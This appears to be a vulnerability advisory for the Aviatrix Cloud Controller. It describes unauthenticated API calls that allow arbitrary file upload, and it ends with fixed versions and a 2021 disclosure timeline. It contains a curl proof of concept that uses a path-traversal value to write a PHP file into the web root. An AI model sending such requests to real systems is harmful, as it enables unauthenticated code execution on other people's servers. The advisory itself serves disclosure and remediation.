Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code
While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including
.php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
Proof of concept
Make the following request to the Aviatrix Cloud Controller
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.
Upgrade to one of the following versions:
UserConnect-6.2-1804.2043 or later
UserConnect-6.3-1804.2490 or later
UserConnect-6.4-1804.2838 or later
UserConnect-6.5-1804.1922 or later
2021-08-24: Reported to Aviatrix security team
2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
2021-09-11: Fix released
2021-09-12: CVE requested
2021-09-13: CVE allocated